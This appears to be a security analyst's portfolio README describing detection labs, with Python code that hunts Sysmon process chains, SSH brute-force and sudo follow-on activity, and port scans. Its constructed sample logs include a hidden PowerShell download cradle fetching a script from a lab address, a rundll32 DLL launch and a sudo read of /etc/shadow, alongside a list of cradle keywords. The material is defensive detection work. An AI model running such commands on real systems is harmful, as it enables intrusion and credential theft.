SOC Analyst • Detection Engineering • Threat Hunting
Focused on bridging the gap between adversary behavior and defensive investigation. I build detection pipelines and adversary emulation labs to master the how and why behind modern cyberattacks.
A hands-on lab simulating post-compromise attacker workflows, including PowerShell download cradles and LSASS credential dumping, to explore both automated and manual threat hunting.
Key Outcome: Conducted manual threat hunting across Sysmon event logs to reconstruct process execution chains (cmd.exe → powershell.exe → rundll32.exe) and authored custom Sigma detections for Living-off-the-Land techniques.
The Stack: Atomic Red Team, Sysmon, Sigma, Hayabusa.
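The chain reconstruction and the Living-off-the-Land logic described above, as an added example (not code from the lab or its Sigma rules): the records are constructed samples carrying only the Sysmon Event ID 1 (ProcessCreate) fields the hunt needs, and the download-cradle indicator list is an illustrative assumption rather than a complete rule.

```python
"""Reconstruct Sysmon process execution chains and flag a LOLBin download
cradle (cmd.exe -> powershell.exe -> rundll32.exe).  Added example for this
page, not code from the lab: the events are constructed samples with the
Sysmon Event ID 1 fields needed here, and the indicator regex is illustrative.
"""
import re

# Constructed Sysmon Event ID 1 records. ProcessGuid/ParentProcessGuid are the
# join keys (Windows reuses PIDs, Sysmon GUIDs are unique). GUIDs shortened.
SYSMON_EVENTS = [
    {"UtcTime": "2024-05-01 10:00:01.000", "ProcessGuid": "{A1}", "ParentProcessGuid": "{00}",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"UtcTime": "2024-05-01 10:00:05.000", "ProcessGuid": "{A2}", "ParentProcessGuid": "{A1}",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c stage.bat"},
    {"UtcTime": "2024-05-01 10:00:06.000", "ProcessGuid": "{A3}", "ParentProcessGuid": "{A2}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://10.0.0.5/a.ps1')\""},
    {"UtcTime": "2024-05-01 10:00:09.000", "ProcessGuid": "{A4}", "ParentProcessGuid": "{A3}",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\a.dll,Run"},
    # Benign control: an interactive PowerShell started from Explorer.
    {"UtcTime": "2024-05-01 10:02:00.000", "ProcessGuid": "{B1}", "ParentProcessGuid": "{A1}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]

# Download-cradle indicators (assumption: a short illustrative list; a real
# rule would be broader). Case-insensitive like a Sigma `contains` modifier.
CRADLE_PATTERN = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|Start-BitsTransfer|\bIEX\b|Invoke-Expression)",
    re.IGNORECASE,
)
SUSPICIOUS_CHAIN = ("cmd.exe", "powershell.exe", "rundll32.exe")


def basename(image: str) -> str:
    """Sysmon Image is a full Windows path; match on the file name only."""
    return image.rsplit("\\", 1)[-1].lower()


def build_chain(events, guid):
    """Follow ParentProcessGuid links to the root; return image names root-first."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    chain, seen = [], set()
    cur = by_guid.get(guid)
    while cur is not None and cur["ProcessGuid"] not in seen:  # seen guards cycles
        seen.add(cur["ProcessGuid"])
        chain.append(basename(cur["Image"]))
        cur = by_guid.get(cur["ParentProcessGuid"])
    return list(reversed(chain))


def is_download_cradle(cmdline: str) -> bool:
    return bool(CRADLE_PATTERN.search(cmdline))


def hunt(events):
    """Return findings: the three-process LOLBin chain and any PowerShell cradle."""
    findings = []
    for e in events:
        chain = build_chain(events, e["ProcessGuid"])
        if tuple(chain[-3:]) == SUSPICIOUS_CHAIN:
            findings.append({"ProcessGuid": e["ProcessGuid"], "chain": chain,
                             "reason": "lolbin_chain"})
        if basename(e["Image"]) == "powershell.exe" and is_download_cradle(e["CommandLine"]):
            findings.append({"ProcessGuid": e["ProcessGuid"], "chain": chain,
                             "reason": "download_cradle"})
    return findings


if __name__ == "__main__":
    for f in hunt(SYSMON_EVENTS):
        print(f["reason"], f["ProcessGuid"], " -> ".join(f["chain"]))
```

Joining on ProcessGuid rather than ProcessId is the point worth keeping from this: PIDs are recycled quickly on a busy host, and a chain rebuilt from PIDs alone will splice unrelated processes together.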
Key Outcome: Developed a workflow to convert platform-agnostic Sigma rules into production-ready Wazuh detections for both Windows and Linux telemetry.
The Stack: Sigma, Wazuh XML Rules, Docker, wazuh-logtest.
Key Outcome: Reconstructed the attacker’s activity timeline by correlating auth.log and auditd telemetry, mapping events to MITRE ATT&CK techniques T1110 (Brute Force) and T1078 (Valid Accounts).
The Stack: Wazuh SIEM, Docker, Linux Auditd.
Key Outcome: Designed a log ingestion and analysis workflow using LogQL to detect SSH brute-force attempts and suspicious sudo activity in real time.
The Stack: Promtail, Loki, Grafana.
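The correlation behind the two projects above (the auth.log/auditd timeline mapped to T1110 and T1078, and the SSH brute-force plus sudo detection), as an added example that is not code from either project: the log lines are constructed, the ISO timestamp form in auth.log is an assumption about the lab's rsyslog configuration, and UID_MAP stands in for the lab host's /etc/passwd.

```python
"""Correlate sshd auth.log and auditd USER_CMD records into an attacker
timeline tagged with ATT&CK T1110 (Brute Force) and T1078 (Valid Accounts).
Added example for this page, not project code.  Assumptions: constructed log
lines, ISO timestamps in auth.log, and UID_MAP in place of /etc/passwd.
"""
import re
from datetime import datetime, timezone

AUTH_LOG = """\
2024-05-01T10:00:01+00:00 lab sshd[1201]: Failed password for invalid user admin from 10.0.0.5 port 51001 ssh2
2024-05-01T10:00:02+00:00 lab sshd[1203]: Failed password for root from 10.0.0.5 port 51002 ssh2
2024-05-01T10:00:03+00:00 lab sshd[1205]: Failed password for tanya from 10.0.0.5 port 51003 ssh2
2024-05-01T10:00:04+00:00 lab sshd[1207]: Failed password for tanya from 10.0.0.5 port 51004 ssh2
2024-05-01T10:00:05+00:00 lab sshd[1209]: Failed password for tanya from 10.0.0.5 port 51005 ssh2
2024-05-01T10:00:09+00:00 lab sshd[1211]: Accepted password for tanya from 10.0.0.5 port 51006 ssh2
2024-05-01T10:00:30+00:00 lab sshd[1301]: Accepted publickey for ops from 192.168.1.10 port 40000 ssh2
""".splitlines()

# auditd hex-encodes a field that contains spaces or quotes; plain values stay
# quoted.  Epoch 1714557660 is 2024-05-01T10:01:00Z.  Constructed records.
AUDIT_LOG = """\
type=USER_CMD msg=audit(1714557660.123:456): pid=2345 uid=1000 auid=1000 ses=4 subj=unconfined msg='cwd="/home/tanya" cmd=636174202F6574632F736861646F77 exe="/usr/bin/sudo" terminal=pts/0 res=success'
type=USER_CMD msg=audit(1714557700.456:470): pid=2400 uid=1001 auid=1001 ses=5 subj=unconfined msg='cwd="/home/ops" cmd="id" exe="/usr/bin/sudo" terminal=pts/1 res=success'
""".splitlines()

UID_MAP = {1000: "tanya", 1001: "ops"}  # assumption: stand-in for /etc/passwd

SSH_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) (?:password|publickey) "
    r"for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
AUDIT_RE = re.compile(
    r"^type=USER_CMD msg=audit\((?P<epoch>\d+)\.\d+:\d+\):.*? auid=(?P<auid>\d+) "
    r".*?cmd=(?P<cmd>[0-9A-Fa-f]+|\"[^\"]*\") .*?res=(?P<res>\w+)")


def decode_audit_cmd(raw: str) -> str:
    """Undo auditd's hex encoding of the sudo command field."""
    if raw.startswith('"'):
        return raw.strip('"')
    return bytes.fromhex(raw).decode("utf-8", errors="replace")


def parse_ssh(lines):
    out = []
    for line in lines:
        m = SSH_RE.match(line)
        if m:
            out.append({"ts": datetime.fromisoformat(m["ts"]), "result": m["result"],
                        "user": m["user"], "ip": m["ip"]})
    return sorted(out, key=lambda e: e["ts"])


def parse_sudo(lines):
    out = []
    for line in lines:
        m = AUDIT_RE.match(line)
        if m and m["res"] == "success":
            out.append({"ts": datetime.fromtimestamp(int(m["epoch"]), tz=timezone.utc),
                        "auid": int(m["auid"]), "cmd": decode_audit_cmd(m["cmd"])})
    return out


def correlate(auth_lines, audit_lines, threshold=5, window=60):
    """Build a time-ordered list of findings; thresholds are lab choices."""
    ssh, timeline, bursts, compromised = parse_ssh(auth_lines), [], {}, {}
    failures = {}
    for e in ssh:
        if e["result"] == "Failed":
            failures.setdefault(e["ip"], []).append(e)
    # T1110: at least `threshold` failures from one source inside `window` seconds.
    for ip, evs in failures.items():
        for i in range(len(evs)):
            win = [x for x in evs[i:] if (x["ts"] - evs[i]["ts"]).total_seconds() <= window]
            if len(win) >= threshold:
                bursts[ip] = win
                users = ", ".join(sorted({x["user"] for x in win}))
                timeline.append({"ts": win[0]["ts"], "technique": "T1110",
                                 "detail": f"{len(win)} failed SSH logins from {ip} "
                                           f"({win[0]['ts'].time()}..{win[-1]['ts'].time()}), users: {users}"})
                break
    # T1078: a success from a brute-forcing source shortly after its burst.
    for e in ssh:
        if e["result"] == "Accepted" and e["ip"] in bursts:
            gap = (e["ts"] - bursts[e["ip"]][-1]["ts"]).total_seconds()
            if 0 <= gap <= window:
                compromised[e["user"]] = e["ts"]
                timeline.append({"ts": e["ts"], "technique": "T1078",
                                 "detail": f"Accepted login for {e['user']} from {e['ip']} "
                                           f"{gap:.0f}s after the brute-force burst"})
    # Follow-on: sudo commands run by a compromised account after that login.
    for s in parse_sudo(audit_lines):
        user = UID_MAP.get(s["auid"])
        if user in compromised and s["ts"] >= compromised[user]:
            since = (s["ts"] - compromised[user]).total_seconds()
            timeline.append({"ts": s["ts"], "technique": None, "cmd": s["cmd"],
                             "detail": f"{user} (auid {s['auid']}) ran sudo {s['cmd']!r} {since:.0f}s after login"})
    timeline.sort(key=lambda x: x["ts"])
    return timeline


if __name__ == "__main__":
    for f in correlate(AUTH_LOG, AUDIT_LOG):
        print(f["ts"].isoformat(), f["technique"] or "follow-on", f["detail"])
```

Two details matter when moving this onto real telemetry: auditd's `cmd=` field is hex-encoded whenever the command contains a space, so a rule that searches for the literal string `/etc/shadow` in raw audit lines will miss it; and the sudo events are attached by `auid` (the login UID, which survives `su` and `sudo`) rather than `uid`, which is what ties privileged commands back to the account that authenticated.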
Suricata-IDS: Deployed and configured Suricata to detect network reconnaissance activity, analyzing EVE.json telemetry generated from simulated Nmap scans.
Auditd-Watch: Implemented Linux audit rules to monitor sensitive files and privilege escalation attempts, analyzing kernel-level events for forensic investigation.
Wazuh-SIEM: Integrated Linux audit telemetry into Wazuh and configured log ingestion to generate security alerts, enabling investigation of privileged command execution.
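The EVE JSON analysis from the Suricata-IDS entry above, as an added example that is not code from the project: the records are constructed to look like Suricata `flow` events from a short Nmap SYN scan (field names follow the EVE schema, values are made up), and the port-count threshold and window are lab choices.

```python
"""Detect port-scan reconnaissance in Suricata EVE JSON output.  Added example
for this page, not project code: the flow records are constructed in the shape
of Suricata `flow` events (one JSON object per line) and the threshold is an
assumption for the lab.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

EVE_TS = "%Y-%m-%dT%H:%M:%S.%f%z"  # Suricata writes e.g. 2024-05-01T10:05:00.000000+0000
BASE = datetime.strptime("2024-05-01T10:05:00.000000+0000", EVE_TS)


def flow_record(offset_s, src, dst, dport, pkts_toserver, pkts_toclient):
    """Build one constructed EVE flow line."""
    ts = (BASE + timedelta(seconds=offset_s)).strftime(EVE_TS)
    return json.dumps({
        "timestamp": ts, "event_type": "flow", "src_ip": src, "src_port": 40000 + dport,
        "dest_ip": dst, "dest_port": dport, "proto": "TCP",
        "flow": {"pkts_toserver": pkts_toserver, "pkts_toclient": pkts_toclient,
                 "state": "closed", "reason": "timeout"},
    })


SCAN_PORTS = [21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445]
EVE_LINES = (
    # Scanner: one SYN out, one SYN/ACK or RST back, per port, within seconds.
    [flow_record(i * 0.2, "10.0.0.5", "10.0.0.20", p, 1, 1) for i, p in enumerate(SCAN_PORTS)]
    # Legitimate client: repeated full sessions to one service.
    + [flow_record(30 + i * 5, "192.168.1.10", "10.0.0.20", 443, 12, 10) for i in range(3)]
    # Non-TCP record the detector must ignore.
    + [json.dumps({"timestamp": "2024-05-01T10:05:01.000000+0000", "event_type": "flow",
                   "src_ip": "10.0.0.5", "dest_ip": "10.0.0.20", "dest_port": 53, "proto": "UDP",
                   "flow": {"pkts_toserver": 1, "pkts_toclient": 1}})]
)


def detect_port_scans(lines, threshold=10, window_seconds=60):
    """Flag (src, dst) pairs touching >= threshold distinct TCP ports within one window."""
    touches = defaultdict(list)
    for line in lines:
        ev = json.loads(line)
        if ev.get("event_type") != "flow" or ev.get("proto") != "TCP":
            continue
        fl = ev.get("flow", {})
        # SYN-scan signature: at most a SYN (+RST) to the server and one reply back.
        half_open = fl.get("pkts_toserver", 0) <= 2 and fl.get("pkts_toclient", 0) <= 1
        touches[(ev["src_ip"], ev["dest_ip"])].append(
            (datetime.strptime(ev["timestamp"], EVE_TS), ev["dest_port"], half_open))
    findings = []
    for (src, dst), items in touches.items():
        items.sort(key=lambda t: t[0])
        start, best = 0, None
        for end in range(len(items)):  # sliding window over time-ordered flows
            while (items[end][0] - items[start][0]).total_seconds() > window_seconds:
                start += 1
            window = items[start:end + 1]
            ports = {p for _, p, _ in window}
            if best is None or len(ports) > best[0]:
                best = (len(ports), window)
        if best and best[0] >= threshold:
            n, window = best
            findings.append({"src_ip": src, "dest_ip": dst, "distinct_ports": n,
                             "half_open_flows": sum(1 for _, _, h in window if h),
                             "first_seen": window[0][0].isoformat(),
                             "last_seen": window[-1][0].isoformat()})
    return findings


if __name__ == "__main__":
    for f in detect_port_scans(EVE_LINES):
        print(f"{f['src_ip']} -> {f['dest_ip']}: {f['distinct_ports']} ports, "
              f"{f['half_open_flows']} half-open flows, {f['first_seen']}..{f['last_seen']}")
```

Counting distinct destination ports per source is what separates a scan from a chatty client: the legitimate host above opens more flows in total than a single scanned port receives, but always to the same port, so it never crosses the threshold. The half-open count is a secondary signal; a connect scan (`nmap -sT`) completes the handshake and would not show it, which is why the port count carries the detection.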
| Category | Tools & Frameworks |
|---|---|
| SIEM / Telemetry | Wazuh, Sysmon, Auditd |
| Detection Engineering | Sigma Rules, Wazuh XML Rules, LogQL |
| Threat Hunting | MITRE ATT&CK, Atomic Red Team, Hayabusa |
| Network Security | Suricata IDS, Nmap |
| Forensics & Analysis | ausearch, aureport, Windows Event Log Analysis |
| Log Pipeline / Observability | Promtail, Loki, Grafana |
| Environment | Docker, KVM/Virt-Manager, Ubuntu 24.04, Windows 10 Pro |
- 👤 LinkedIn: in/tanyapriyaofficial
- 🌐 Portfolio: tanya-priya.github.io
- 📧 Email: tanya.priya.blue@gmail.com
"Visibility is the first step toward defense."